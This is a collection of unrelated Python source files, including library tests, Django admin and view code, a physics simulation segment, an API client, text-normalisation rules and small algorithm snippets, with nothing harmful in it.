def test_episode_steps_partial_step(self):
for _ in range(3):
# Every episode, including the first, should start at zero.
self.assertEqual(self.writer.episode_steps, 0)
for i in range(1, 4):
self.writer.append({'x': 3}, partial_step=True)
# Step count should not increment on partial append calls.
self.assertEqual(self.writer.episode_steps, i - 1)
self.writer.append({'y': 2})
# Step count should increment after the unqualified append call.
self.assertEqual(self.writer.episode_steps, i)
# Ending the episode should reset the step count to zero.
self.writer.end_episode()
class TrajectoryColumnTest(parameterized.TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._server = server_lib.Server([server_lib.Table.queue('queue', 100)])
def setUp(self):
super().setUp()
self.client = client_lib.Client(f'localhost:{self._server.port}')
@classmethod
def tearDownClass(cls):
super().tearDownClass()
cls._server.stop()
def test_numpy(self):
writer = self.client.trajectory_writer(num_keep_alive_refs=10)
for i in range(10):
writer.append({'a': i, 'b': np.ones([3, 3], np.float) * i})
np.testing.assert_array_equal(writer.history['a'][:].numpy(),
np.arange(i + 1, dtype=np.int64))
np.testing.assert_array_equal(
writer.history['b'][:].numpy(),
np.stack([np.ones([3, 3], np.float) * x for x in range(i + 1)]))
def test_numpy_squeeze(self):
writer = self.client.trajectory_writer(num_keep_alive_refs=10)
for i in range(10):
writer.append({'a': i})
self.assertEqual(writer.history['a'][-1].numpy(), i)
def test_validates_squeeze(self):
# Exactly one is valid.
trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)], squeeze=True)
# Zero is not fine.
with self.assertRaises(ValueError):
trajectory_writer.TrajectoryColumn([], squeeze=True)
# Neither is two (or more).
with self.assertRaises(ValueError):
trajectory_writer.TrajectoryColumn(
[FakeWeakCellRef(1), FakeWeakCellRef(2)], squeeze=True)
def test_len(self):
for i in range(1, 10):
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)] * i)
self.assertLen(column, i)
def test_none_raises(self):
with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
trajectory_writer.TrajectoryColumn([None])
with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1), None])
@parameterized.named_parameters(
('int', 0),
('float', 1.0),
('bool', True),
('np ()', np.empty(())),
('np (1)', np.empty((1))),
('np (1, 1)', np.empty((1, 1))),
('np (3, 4, 2)', np.empty((3, 4, 2))),
)
def test_shape(self, data):
expected_shape = np.asarray(data).shape
for i in range(1, 10):
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)] * i)
self.assertEqual(column.shape, (i, *expected_shape))
def test_shape_squeezed(self):
expected_shape = (2, 5)
data = np.arange(10).reshape(*expected_shape)
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)],
squeeze=True)
self.assertEqual(column.shape, expected_shape)
@parameterized.named_parameters(
('int', 0),
('float', 1.0),
('bool', True),
('np_float16', np.empty(shape=(), dtype=np.float16)),
('np_float32', np.empty(shape=(), dtype=np.float32)),
('np_float64', np.empty(shape=(), dtype=np.float64)),
('np_int8', np.empty(shape=(), dtype=np.int8)),
('np_int16', np.empty(shape=(), dtype=np.int16)),
('np_int32', np.empty(shape=(), dtype=np.int32)),
('np_int64', np.empty(shape=(), dtype=np.int64)),
('np_uint8', np.empty(shape=(), dtype=np.uint8)),
('np_uint16', np.empty(shape=(), dtype=np.uint16)),
('np_uint32', np.empty(shape=(), dtype=np.uint32)),
('np_uint64', np.empty(shape=(), dtype=np.uint64)),
('np_complex64', np.empty(shape=(), dtype=np.complex64)),
('np_complex128', np.empty(shape=(), dtype=np.complex128)),
('np_bool', np.empty(shape=(), dtype=np.bool)),
('np_object', np.empty(shape=(), dtype=np.object)),
)
def test_dtype(self, data):
expected_dtype = np.asarray(data).dtype
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)])
self.assertEqual(column.dtype, expected_dtype)
if __name__ == '__main__':
absltest.main()
|
python
|
from django.contrib import admin
from activities.models import *
# Register your models here.
admin.site.register(Activity)
|
python
|
from django.contrib import admin
from .models import GoogleAuthUser
class GoogleAuthUserOption(admin.ModelAdmin):
"""GoogleAuthUser options"""
list_display = ('user', 'refresh_token')
search_fields = ('user',)
admin.site.register(GoogleAuthUser, GoogleAuthUserOption)
|
python
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Translate a glob-style pattern to a regular expression.
"""
__version__ = "$Id$"
#end_pymotw_header
import fnmatch
pattern = 'fnmatch_*.py'
print 'Pattern :', pattern
print 'Regex :', fnmatch.translate(pattern)
|
python
|
#!/usr/bin/env python
from icecube import icetray, dataclasses
def ConvertToLinearizedMCTree(frame):
if 'I3MCTree' in frame:
try:
tree = dataclasses.I3LinearizedMCTree(frame['I3MCTree'])
except:
icecube.icetray.logging.log_error('cannot convert to I3LinearizedMCTree')
else:
del frame['I3MCTree']
frame['I3MCTree'] = tree
return True
@icetray.traysegment
def DetectorSim(tray, name,
RandomService = None,
RunID = None,
GCDFile = None,
KeepMCHits = False,
KeepPropagatedMCTree = False,
KeepMCPulses = False,
SkipNoiseGenerator = False,
LowMem = False,
InputPESeriesMapName = "I3MCPESeriesMap",
BeaconLaunches = True,
TimeShiftSkipKeys=[],
FilterTrigger=True):
"""
Read photon-propagated (MCPE) files, simulate noise, PTM response, DOMLaunches, and trigger.
:param RandomService: the name of a random service to be used by the tank response
:param RunID: Number of run that will be writtend to I3EventHeader
:param GCDFile: path to GCD file to read first
:param KeepMCHits: keep MCPEs in frame
:param KeepPropagatedMCTree: keep MCTree with all in-ice propagated secondaries. These take a lot of space compared un propagated tree.
:param KeepMCPulses: keep I3MCPulseSeriesMap in frame.
:param SkipNoiseGenerator: do not run Vuvuzela.
:param LowMem: reduce peak memory use by repeatedly merging hits as they are generated. WARNING: Use of this option may slightly reduce precision and drastically increase running time. It is potentially useful for very bright events, and probably harmful for very long events.
:param InputPESeriesMapName: name of input I3MCPESeriesMap object.
:param BeaconLaunches: add beacon lauches.
:param TimeShiftSkipKeys: list of keys that should be time-shifted. Default: shift all Time-like objects.
:param FilterTrigger: remove events that don't pass any trigger.
"""
from icecube import icetray, dataclasses, dataio, phys_services
from icecube import trigger_sim
from I3Tray import I3Units
from icecube import DOMLauncher
from icecube import topsimulator
if RunID is None:
icetray.logging.log_fatal("You *must* set a RunID in production.")
if not RandomService:
icetray.logging.log_fatal("You *must* set a RandomService name.")
MCPESeriesMapNames = [
InputPESeriesMapName,
"BackgroundI3MCPESeriesMap",
"SignalI3MCPEs"
]
MCPulseSeriesMapNames = [
"I3MCPulseSeriesMap",
"I3MCPulseSeriesMapParticleIDMap"
]
MCTreeNames = [
"I3MCTree",
"BackgroundI3MCTree",
"SignalMCTree"
]
MCPMTResponseMapNames = []
if not SkipNoiseGenerator:
InputPESeriesMapName_withoutNoise = InputPESeriesMapName + "WithoutNoise"
tray.Add("Rename", "RenamePESeriesMap",
Keys=[InputPESeriesMapName, InputPESeriesMapName_withoutNoise])
MCPESeriesMapNames.append(InputPESeriesMapName_withoutNoise)
from icecube import vuvuzela
tray.AddSegment(vuvuzela.AddNoise, name+"_vuvuzela",
OutputName = InputPESeriesMapName,
InputName = InputPESeriesMapName_withoutNoise,
StartTime = -10.*I3Units.microsecond,
EndTime = 10.*I3Units.microsecond,
RandomServiceName = RandomService,
)
tray.AddSegment(DOMLauncher.DetectorResponse, "DetectorResponse",
pmt_config = {'Input':InputPESeriesMapName,
'Output':"I3MCPulseSeriesMap",
'MergeHits':True,
'LowMem':LowMem,
'RandomServiceName' : RandomService},
dom_config = {'Input':'I3MCPulseSeriesMap',
'Output':"I3DOMLaunchSeriesMap",
'UseTabulatedPT':True,
'RandomServiceName' : RandomService,
'BeaconLaunches':BeaconLaunches})
timeshiftargs={'SkipKeys':TimeShiftSkipKeys}
tray.AddSegment(trigger_sim.TriggerSim,
name+'_triggersim',
gcd_file=dataio.I3File(GCDFile), # for trigger auto-configuration
run_id = RunID,
prune = True,
time_shift = True,
time_shift_args = timeshiftargs,
filter_mode = FilterTrigger
)
tray.AddModule('I3PrimaryPulseMapper', 'MapPrimariesToPulses')
tray.AddModule('I3TopAddComponentWaveforms', 'AddComponentWaveforms',
PESeriesMap='I3MCPESeriesMap',
Waveforms="")
tray.AddModule("Delete", name+"_cleanup",
Keys = ["MCTimeIncEventID",
"MCPMTResponseMap",
])
if not KeepMCPulses:
tray.AddModule("Delete", name+"_cleanup_2",
Keys = MCPulseSeriesMapNames + MCPMTResponseMapNames)
if not KeepMCHits:
tray.AddModule("Delete", name+"_cleanup_I3MCHits_2",
Keys = MCPESeriesMapNames)
if not KeepPropagatedMCTree: # Always keep original tree
tray.AddModule("Delete", name+"_cleanup_I3MCTree_3",
Keys = MCTreeNames)
@icetray.traysegment
def DetectorSegment(tray,name,If=lambda f:True,
gcdfile='',
mctype='corsika_weighted',
MCPESeriesMapName='I3MCPESeriesMap',
detector_label='IC86:2012',
runtrigger=True,
filtertrigger=True,
stats={},
basicHisto=False,
icetop=False,
genie=False,
prescale=1,
uselineartree=True,
lowmem=False,
BeaconLaunches=True,
TimeShiftSkipKeys=[],
GeneratedEfficiency=0.0,
SampleEfficiency=0.0,
RunID=None,
KeepMCHits = False,
KeepPropagatedMCTree = False,
KeepMCPulses = False,
):
"""
Run IC86 detector simulation
"""
from .. import segments
# Combine MCPEs from both detectors
if genie:
tray.Add("Rename", Keys=[MCPESeriesMapName, 'GenieMCPEs'])
tray.Add("I3CombineMCPE",
InputResponses = ["GenieMCPEs", "BackgroundMCPEs"],
OutputResponse = MCPESeriesMapName)
tray.Add("Delete", Keys=['BackgroundMCPEs','GenieMCPEs'])
if icetop:
tray.Add("Rename", Keys=[MCPESeriesMapName, 'InIceMCPEs'])
tray.Add("I3CombineMCPE",
InputResponses = ["IceTopMCPEs", "InIceMCPEs"],
OutputResponse = MCPESeriesMapName)
tray.Add("Delete", Keys=['InIceMCPEs', 'IceTopMCPEs'])
# Sample a different efficiency
if SampleEfficiency > 0.0:
if SampleEfficiency > GeneratedEfficiency:
icecube.icetray.logging.log_fatal(
'Cannot upscale from GeneratedEfficiency %s to SampleEfficiency %s' % (
SampleEfficiency, GeneratedEfficiency))
tray.AddSegment(segments.MultiDomEffSample,"resample",
GeneratedEfficiency=GeneratedEfficiency,
SampleEfficiencies=[SampleEfficiency],
InputSeriesName=MCPESeriesMapName,
DeleteOriginalSeries=True,
OverwriteOriginalSeries=True,
)
tray.AddSegment(DetectorSim, "DetectorSim",
RandomService = 'I3RandomService',
GCDFile = gcdfile,
InputPESeriesMapName = MCPESeriesMapName,
KeepMCHits = KeepMCHits,
KeepMCPulses = KeepMCPulses,
KeepPropagatedMCTree = KeepPropagatedMCTree,
LowMem = lowmem,
BeaconLaunches=BeaconLaunches,
SkipNoiseGenerator = False,
TimeShiftSkipKeys = TimeShiftSkipKeys,
FilterTrigger=filtertrigger,
RunID=RunID)
from ..util import BasicCounter, DAQCounter
tray.AddModule(BasicCounter,"count_triggers",
Streams = [icetray.I3Frame.DAQ] ,
name="%s Triggered Events" % detector_label,
Stats=stats)
skipkeys = [ "I3Triggers", "EnhancementFactor", "MCPMTResponseMap", "MCTimeIncEventID"]
skipkeys += ["IceTopRawData_unused","MCPMTResponseMap","MCTopHitSeriesMap"]
if "NKGInfo" in skipkeys: # Keep NKGInfo for IceTop
skipkeys.remove("NKGInfo")
if uselineartree:
tray.AddModule(ConvertToLinearizedMCTree,"lineartree",streams=[icetray.I3Frame.DAQ])
|
python
|
import json
from unittest import mock
from routemaster.db import Label, History
def test_root(client, version):
response = client.get('/')
assert response.json == {
'status': 'ok',
'state-machines': '/state-machines',
'version': version,
}
def test_root_error_state(client, version):
with mock.patch(
'sqlalchemy.orm.query.Query.one',
side_effect=RuntimeError,
):
response = client.get('/')
assert response.status_code == 503
assert response.json == {
'status': 'error',
'message': 'Cannot connect to database',
'version': version,
}
def test_enumerate_state_machines(client, app):
response = client.get('/state-machines')
assert response.status_code == 200
assert response.json == {'state-machines': [
{
'name': state_machine.name,
'labels': f'/state-machines/{state_machine.name}/labels',
}
for state_machine in app.config.state_machines.values()
]}
def test_create_label(client, app, mock_test_feed):
label_name = 'foo'
state_machine = app.config.state_machines['test_machine']
label_metadata = {'bar': 'baz'}
with mock_test_feed():
response = client.post(
f'/state-machines/{state_machine.name}/labels/{label_name}',
data=json.dumps({'metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 201
assert response.json['metadata'] == {'bar': 'baz'}
with app.new_session():
label = app.session.query(Label).one()
assert label.name == label_name
assert label.state_machine == state_machine.name
assert label.metadata == label_metadata
history = app.session.query(History).one()
assert history.label_name == label_name
assert history.old_state is None
assert history.new_state == state_machine.states[0].name
def test_create_label_404_for_not_found_state_machine(client):
response = client.post(
'/state-machines/nonexistent_machine/labels/foo',
data=json.dumps({'metadata': {'bar': 'baz'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_create_label_400_for_invalid_body(client):
response = client.post(
'/state-machines/test_machine/labels/foo',
data='not valid json',
content_type='application/json',
)
assert response.status_code == 400
def test_create_label_400_for_missing_metadata_key(client):
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({}),
content_type='application/json',
)
assert response.status_code == 400
def test_create_label_409_for_already_existing_label(client, create_label):
create_label('foo', 'test_machine', {})
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {}}),
content_type='application/json',
)
assert response.status_code == 409
def test_update_label(client, app, create_label, mock_webhook, mock_test_feed):
create_label('foo', 'test_machine', {})
label_metadata = {'bar': 'baz'}
with mock_webhook(), mock_test_feed():
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 200
assert response.json['metadata'] == label_metadata
with app.new_session():
label = app.session.query(Label).one()
assert label.metadata == label_metadata
def test_update_label_404_for_not_found_label(client):
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_update_label_404_for_not_found_state_machine(client):
response = client.patch(
'/state-machines/nonexistent_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_update_label_400_for_invalid_body(client, create_label):
create_label('foo', 'test_machine', {})
response = client.patch(
'/state-machines/test_machine/labels/foo',
data='not valid json',
content_type='application/json',
)
assert response.status_code == 400
def test_update_label_400_for_no_metadata(client, app, create_label):
create_label('foo', 'test_machine', {})
label_metadata = {'bar': 'baz'}
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'not_metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 400
def test_get_label(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 200
assert response.json['metadata'] == {'bar': 'baz'}
def test_get_label_has_state(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 200
assert response.json['state'] == 'start'
def test_get_label_404_for_not_found_label(client, create_label):
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 404
def test_get_label_404_for_not_found_state_machine(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/nonexistent_machine/labels/foo')
assert response.status_code == 404
def test_list_labels_404_for_not_found_state_machine(client, create_label):
response = client.get('/state-machines/nonexistent_machine/labels')
assert response.status_code == 404
def test_list_labels_when_none(client, create_label):
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == []
def test_list_labels_includes_link_to_create_labels(client, create_label):
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert (
response.json['create'] ==
'/state-machines/test_machine/labels/:name'
)
def test_list_labels_when_one(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == [{'name': 'foo'}]
def test_list_labels_when_many(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
create_label('quox', 'test_machine', {'spam': 'ham'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
# Always returned in alphabetical order
assert response.json['labels'] == [{'name': 'foo'}, {'name': 'quox'}]
def test_update_label_moves_label(client, create_label, app, mock_webhook, mock_test_feed, current_state):
label = create_label('foo', 'test_machine', {})
with mock_webhook() as webhook, mock_test_feed():
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'should_progress': True}}),
content_type='application/json',
)
webhook.assert_called_once()
assert response.status_code == 200
assert response.json['metadata'] == {'should_progress': True}
assert current_state(label) == 'end'
def test_delete_existing_label(client, app, create_label):
label_name = 'foo'
state_machine = app.config.state_machines['test_machine']
create_label(label_name, state_machine.name, {'bar': 'baz'})
response = client.delete(
f'/state-machines/{state_machine.name}/labels/{label_name}',
content_type='application/json',
)
assert response.status_code == 204
with app.new_session():
label = app.session.query(Label).one()
assert label.name == label_name
assert label.state_machine == state_machine.name
assert label.metadata == {}
history = app.session.query(History).order_by(
History.id.desc(),
).first()
assert history is not None
assert history.label_name == label_name
assert history.old_state == state_machine.states[0].name
assert history.new_state is None
def test_delete_non_existent_label(client, app):
# When deleting a non-existent label, we do nothing.
response = client.delete(
f'/state-machines/test_machine/labels/foo',
content_type='application/json',
)
assert response.status_code == 204
with app.new_session():
assert app.session.query(Label).count() == 0
assert app.session.query(History).count() == 0
def test_delete_label_404_for_not_found_state_machine(client):
response = client.delete(
'/state-machines/nonexistent_machine/labels/foo',
content_type='application/json',
)
assert response.status_code == 404
def test_list_labels_excludes_deleted_labels(
client,
create_label,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
create_label('quox', 'test_machine', {'spam': 'ham'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == [{'name': 'quox'}]
def test_get_label_410_for_deleted_label(
client,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 410
def test_create_label_409_for_deleted_label(client, create_label):
create_label('foo', 'test_machine', {})
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {}}),
content_type='application/json',
)
assert response.status_code == 409
def test_update_label_410_for_deleted_label(
client,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 410
|
python
|
"""A `WorkItem` carries information about potential and completed work in the
Cosmic Ray system.
`WorkItem` is one of the central structures in CR. It can describe both work
to be done and work that has been done, and it indicates how test sessions have
completed.
"""
def make_record(name, fields=(), docstring=""):
"""Create a new record class.
A Record is fundamentally a dict with a specified set of keys. These keys
will always have a value (defaulting to None), they can't be removed, and
new keys can not be added.
This may sound a lot like a class, and that's true. The main benefit of
records is that they can be treated directly like dicts for the most part,
and, critically, they are easy to JSON-ify. Also, like classes, they ensure
that they're only used in the correct way, i.e. users can only access the
specified fields. This prevents the confusion of using simple dicts where
people can use conflicting or confusing key names.
Args:
name: The name of the class to be created.
fields: The names of the fields in the record.
docstring: The docstring for the record class.
Returns: A new class derived from dict with the specified fields.
"""
def __init__(self, vals=None, **kwargs):
dict.__init__(self, dict.fromkeys(fields))
values = vals or dict()
kwargs.update(values)
for key, value in kwargs.items():
self[key] = value
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError('no attribute {}'.format(name))
def __setattr__(self, name, value):
try:
self[name] = value
except KeyError:
raise AttributeError('no attribute {}'.format(name))
def __getitem__(self, name):
if name not in self:
raise KeyError('no field {} in record'.format(name))
return dict.__getitem__(self, name)
def __setitem__(self, name, value):
if name not in self:
raise KeyError('no field {} in record'.format(name))
dict.__setitem__(self, name, value)
def __delitem__(self, name): # pylint: disable=unused-argument
msg = 'record does not support deleting fields: {}'.format(name)
raise KeyError(msg)
def update(self, container):
"""Add all key-value pairs from `container` into this record.
If there are duplicate keys, those in `container` will overwrite those
here.
"""
for key, values in container.items():
self[key] = values
attrs = {
'__init__': __init__,
'__getattr__': __getattr__,
'__setattr__': __setattr__,
'__getitem__': __getitem__,
'__setitem__': __setitem__,
'__delitem__': __delitem__,
'update': update
}
rec = type(name, (dict,), attrs)
rec.__doc__ = docstring
return rec
WorkItem = make_record( # pylint: disable=invalid-name
'WorkItem',
[
# Arbitrary data returned by the concrete TestRunner to provide more
# information about the test results.
'data',
# A test_runner.TestOutcome from the test run.
'test_outcome',
# A worker.WorkOutcome describing how the worker completed.
'worker_outcome',
# The diff produced by the operators
'diff',
# the module to be mutated
'module',
# The name of the operators
'operator',
# The occurrence on which the operator was applied.
'occurrence',
# The line number at which the operator was applied.
'line_number',
'command_line',
'job_id'
],
docstring=" The details of a specific mutation and test run in CosmicRay."
)
|
python
|
import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist
(x_train, t_train), (x_test, t_test) = \
load_mnist(normalize=True, one_hot_label=True)
train_size = x_train.shape[0]
batch_size = 10
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
def cross_entropy_error(y, t):
if y.ndim == 1:
t = t.reshape(1, t.size)
y = y.reshape(1, y.size)
batch_size = y.shape[0]
return -np.sum(t * np.log(y[np.arrange(batch_size), t])) / batch_size
|
python
|
import requests
from src.mercadolibre.OAuth import OAuth
from src.mercadolibre.enums import paths
from src.mercadolibre.enums.HttpMethods import HttpMethods
class Client:
def __init__(self, access_token=None, refresh_token=None):
self.access_token = access_token
self.refresh_token = refresh_token
self.method = HttpMethods.GET
self.url = ''
self.headers = None
self.query_params = None
self.request_params = None
self.is_search = False
self.object_name = None
self.response_data_list = []
def request(self, method=HttpMethods.GET, path=None, query_params=None, data=None):
self.method = method
self.url = f'{paths.BASE_URL}{path}'
self.query_params = query_params
self.data = data
response = self.__submit_request()
error = None
tokens = None
if not isinstance(response.json(), list):
error = response.json().get('error')
if (error == 'invalid_grant' or error == 'not_found') and self.access_token:
tokens = self.__refresh_token()
response = self.__submit_request()
return response, tokens
def __submit_request(self):
self.__set_headers()
response = requests.request(method=self.method, url=self.url, headers=self.headers, params=self.query_params,
json=self.data)
return response
def __set_headers(self):
if self.access_token:
self.headers = {'Authorization': f'Bearer {self.access_token}'}
def __refresh_token(self):
response = OAuth().refresh_token(refresh_token=self.refresh_token)
response_json = response.json()
self.access_token = response_json.get('access_token')
return {'access_token': self.access_token,
'refresh_token': response_json.get('refresh_token')}
|
python
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib import messages
# Create your views here.
def register(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
messages.success(request,f'Account created for {username}!')
return redirect('blog-home')
else:
form = UserCreationForm()
return render(request,'users/register.html',{'form':form})
|
python
|
""""""
__all__ = ['Pipeline']
# Standard library modules.
import asyncio
# Third party modules.
from loguru import logger
import tqdm
# Local modules.
# Globals and constants variables.
class Pipeline:
def __init__(self, tasks, stop_on_failure=False):
self.tasks = tuple(tasks)
self.stop_on_failure = stop_on_failure
async def run(self, progress=True):
"""
Runs the *inputdata* through the pipeline.
"""
success_tasks = []
it = enumerate(self.tasks)
if progress:
it = tqdm.tqdm(it, total=len(self.tasks))
for i, task in it:
task_name = task.name
if progress:
it.set_description(task_name)
logger.debug('Running task #{}: {}', i, task_name)
# Run task.
try:
success = await task.run(progress=progress)
except:
logger.exception('Task #{} failed: {}', i, task_name)
success = False
if self.stop_on_failure:
raise
if success:
success_tasks.append(task)
logger.debug('Task #{} succeeded: {}', i, task_name)
else:
logger.debug('Task #{} skipped: {}', i, task_name)
return success_tasks
|
python
|
class Solution:
def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:
|
python
|
#!/usr/bin/env python
#
import os, unittest
here = os.path.abspath(os.path.dirname(__file__))
class TestCase(unittest.TestCase):
def test(self):
"neutron_storage: no neutron saved"
workdir = 'NeutronStorage-zero-neutrons'
saved = os.path.abspath('.')
os.chdir(workdir)
if os.system('bash test.sh'):
raise RuntimeError("Failed")
return
pass # end of TestCase
if __name__ == "__main__": unittest.main()
# End of file
|
python
|
import re
#source: https://en.wiktionary.org/wiki/Category:English_abbreviations
ABBREVIATIONS_COMMON = [(re.compile(r'\b%s\.?(,?)\b' % x[0]), r'%s\1 ' % x[1]) for x in [
("abbr", "abbreviation"),
("abbrev", "abbreviation"),
#("abr", "abridged"),
("abstr", "abstract"),
("AI", "artificial intelligence"),
#("Amer", "american"),
#("am", "ante meridiem"),
#("AM", "ante meridiem"),
("approx", "approximately"),
("[Aa]pr", "april"),
("[Aa]pt", "apartment"),
("[Aa]pts", "apartments"),
("appt", "appointment"),
("[Aa]ssoc", "association"),
("[Aa]sst", "assistant"),
#("[Aa]ug", "august"),
#("auth", "authority"),
("[Aa]v", "avenue"),
("ave", "average"),
("[Bb]lvd", "boulevard"),
("ca", "circa"),
("Capt", "captain"),
("cert", "certified"),
("cllr", "councillor"),
("co", "company"),
("c\/o", "care of"),
("\.com", " dot com"),
("colloq", "colloquial"),
("Comdr", "commander"),
("cont\'d", "continued"),
("Corp", "corporation"),
("Ctrl", "control"),
("Dr", "doctor"),
("dr", "drive"),
#("[Dd]ec", "december"),
("[Dd]ept", "department"),
("[Dd]istrib", "distributor"),
("[Ee]d", "edition"),
("est", "established"),
("etc", "etcetra"),
("[Ee]xec", "executive"),
#("[Ff]eb", "february"),
("[Ff]wd", "forward"),
("[Gg]ov", "government"),
("[Gg]ov\'t", "government"),
("GMT", "greenwich mean time"),
("Hebr", "hebrew"),
("[Hh]on\'ble", "honorable"),
("Hon", "honorable"),
("i\.e", "that is"),
("illust?", "illustration"),
("[Ii]ntro", "introduction"),
("[Ii]nc", "incorporated"),
#("[Jj]an", "january"),
("[Jj]our", "journal"),
("Jr", "junior"),
("[Ll]n", "lane"),
("Lieut", "lieutenant"),
("[Ll]td", "limited"),
("Maj", "major"),
("mfg", "manufacturing"),
("[Mm]gmt", "management"),
("min", "minute"),
("misc", "miscellaneous"),
("mktg", "marketing"),
("Mr", "mister"),
("Mrs", "missus"),
("Ms", "miss"),
("Mme", "madame"),
("n\.b", "nota bene"),
("net wt", "net weight"),
#("[Nn]ov", "november"),
#("no", "number"),
#("occupn", "occupation"),
#("[Oo]ct", "october"),
("[Oo]rg", "organisation"),
("PM", "prime minister"), #conflict with pm in time expressions
#("pm", "post meridiem"),
#("PM", "post meridiem"),
("[Pp]res", "president"),
("Prof", "professor"),
("[Pp]vt", "private"),
("[Qq]uot", "quotation"),
("[Rr]egd", "registered"),
("[Rr]egds", "regards"),
#("sched", "schedule"),
("sec", "section"),
#("[Ss]ept", "september"),
("smth", "something"),
("Sqn Ldr", "squadron leader"),
("Sr", "senior"),
("St", "saint"),
("st", "street"),
("tbsp", "tablespoon"),
("[Tt]el", "telephone"),
("tsp", "teaspoon"),
("UK", "United Kingdom"),
("unabr", "unabridged"),
("unk", "unknown"),
("US", "United States"),
("vol", "volume"),
("vols", "volumes"),
("[Vv]s", "versus"),
#("viz", "namely"),
("wt", "weight"),
("WWI", "world war one"),
("WWII", "world war two"),
("WWIII", "world war three"),
("WW1", "world war one"),
("WW2", "world war two"),
("WW3", "world war three"),
("[Xx]mas", "christmas"),
#("N", "North"),
#("E", "East"),
#("W", "West"),
#("S", "South"),
("@", " at"),
("#", "hashtag"),
("&", " and"),
("\+", " plus"),
("\=", " is equal to"),
("\*", " times"),
]]
class AbbreviationConverter:
def __init__(self,lang):
super(AbbreviationConverter,self).__init__()
self.lang = lang
def transform(self,text):
text = self.convert_abbreviations(text)
return text
def convert_abbreviations(self,text):
for regex, replacement in ABBREVIATIONS_COMMON:
try:
text = re.sub(regex, replacement, text)
except:
print('Abbreviation conversion failed')
return text
|
python
|
def insertionSort(arr):
for x in range(1, len(arr)):
item = arr[x]
i = x - 1
while i >= 0 and item < arr[i]:
arr[i + 1] = arr[i]
i -= 1
arr[i + 1] = item
return arr
print(insertionSort([1,9,8,4,6,7,3,12,5,18,2,22]))
|
python
|
"""Originally Adapted from sphinxcontrib.details.directive
"""
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx.util.docutils import SphinxDirective
from sphinx.transforms.post_transforms import SphinxPostTransform
from sphinx.util.nodes import NodeMatcher
def setup_dropdown(app):
app.add_node(dropdown_main, html=(visit_dropdown_main, depart_dropdown_main))
app.add_node(dropdown_title, html=(visit_dropdown_title, depart_dropdown_title))
app.add_directive("dropdown", DropdownDirective)
app.add_post_transform(DropdownHtmlTransform)
class dropdown_main(nodes.Element, nodes.General):
pass
class dropdown_title(nodes.TextElement, nodes.General):
pass
def visit_dropdown_main(self, node):
if node.get("opened"):
self.body.append(self.starttag(node, "details", open="open"))
else:
self.body.append(self.starttag(node, "details"))
def depart_dropdown_main(self, node):
self.body.append("</details>")
def visit_dropdown_title(self, node):
self.body.append(self.starttag(node, "summary"))
def depart_dropdown_title(self, node):
self.body.append("</summary>")
class DropdownDirective(SphinxDirective):
optional_arguments = 1
final_argument_whitespace = True
has_content = True
option_spec = {
"container": directives.unchanged,
"title": directives.unchanged,
"body": directives.unchanged,
"open": directives.flag,
"marker-color": directives.unchanged,
"name": directives.unchanged,
"animate": lambda a: directives.choice(a, ("fade-in", "fade-in-slide-down")),
}
def run(self):
# default classes
classes = {
"container_classes": ["mb-3"],
"title_classes": [],
"body_classes": [],
}
# add classes from options
for element in ["container", "title", "body"]:
if element not in self.options:
continue
value = self.options.get(element).strip()
if value.startswith("+"):
classes.setdefault(element + "_classes", []).extend(value[1:].split())
